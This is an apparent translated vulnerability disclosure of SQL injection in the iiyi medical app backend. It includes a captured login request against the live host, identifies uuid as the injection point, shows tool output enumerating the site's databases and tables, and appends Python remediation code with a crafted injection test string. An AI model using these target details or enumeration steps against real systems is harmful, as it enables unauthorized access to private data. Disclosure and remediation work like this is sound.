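2014-04-12: Details reported to the vendor; awaiting vendor handling
2014-04-17: The vendor chose to ignore the vulnerability; details disclosed to the public
SQL injection in the 爱爱医 (iiyi) app backend
Log in and capture the request: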
POST /zlzs/v6/user/login/ HTTP/1.1
Content-Length: 105
Content-Type: application/x-www-form-urlencoded
Host: iapp.iiyi.com
Accept-Encoding: gzip
Proxy-Connection: close
Connection: close

username=test&version=62&signature=316fb0a67b25435b&os=2&uuid=864394014414512&password=test&channel=iiyi
POST injection; the injection point is the uuid parameter.
Databases:
available databases [3]:
[*] iiyicenter
[*] information_schema
[*] test
144 tables. Listing them was very, very slow... so I did not enumerate them all.
fetching tables for database: 'iiyicenter'
fetching number of tables for database 'iiyicenter'
resumed: 144
resumed: advertise
resumed: advertise_static
resumed: app_access_detail
resumed: app_access_uuid
resumed: app_activety
resumed: app_counts
resumed: app_coupon
resumed: app_cbversion
resumed: applica_content
resumed: applica_content_copy
resumed: applica_dbversion
resumed: applica_downdetial
resumed: applica_perdownload
resumed: applica_sort
resumed: band_records
resumed: base_area
resumed: base_hospital
resumed: bbs_sphinx
resumed: beans_order
resumed: case
resumed: case_admin
resumed: case_collection
resumed: case_comment
resuming partial value: case_comment_sup
This speed is unbearable.
↑
╮(╯▽╰)╭
Severity: no impact (ignored by vendor)
Ignored at: 2014-04-17 20:08
None yet.
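The report leaves remediation open. As an added example (not part of the original report and not the vendor's code), the sketch below shows the fix class for an injectable uuid field: bind the value as a query parameter and validate its shape first. The table name, rows, 15-digit format rule and function names are assumptions made for illustration, and SQLite stands in for the real database.

```python
import re
import sqlite3

# Assumption: device identifiers are 15-digit strings, the shape of the uuid
# field in the captured login request.
UUID_RE = re.compile(r"[0-9]{15}")

def make_db():
    """In-memory stand-in for the backend; table and rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE device_access (uuid TEXT, username TEXT)")
    conn.executemany(
        "INSERT INTO device_access VALUES (?, ?)",
        [("123456789012345", "alice"), ("543210987654321", "bob")],
    )
    return conn

def lookup_concatenated(conn, uuid):
    """'Before': the client-supplied uuid becomes part of the SQL text."""
    sql = "SELECT username FROM device_access WHERE uuid = '" + uuid + "'"
    return sorted(row[0] for row in conn.execute(sql))

def lookup_bound(conn, uuid):
    """'After': the uuid is bound as data and can never alter the statement."""
    sql = "SELECT username FROM device_access WHERE uuid = ?"
    return sorted(row[0] for row in conn.execute(sql, (uuid,)))

def lookup_validated(conn, uuid):
    """Defence in depth: reject malformed identifiers before touching the DB."""
    if not UUID_RE.fullmatch(uuid):
        raise ValueError("uuid must be exactly 15 digits")
    return lookup_bound(conn, uuid)

if __name__ == "__main__":
    db = make_db()
    crafted = "x' OR '1'='1"  # constructed test value, not from the report
    print("concatenated:", lookup_concatenated(db, crafted))
    print("bound:       ", lookup_bound(db, crafted))
```

Fields that the mobile client generates itself, such as a device identifier, need the same binding as username and password, because anyone replaying the request can set them freely.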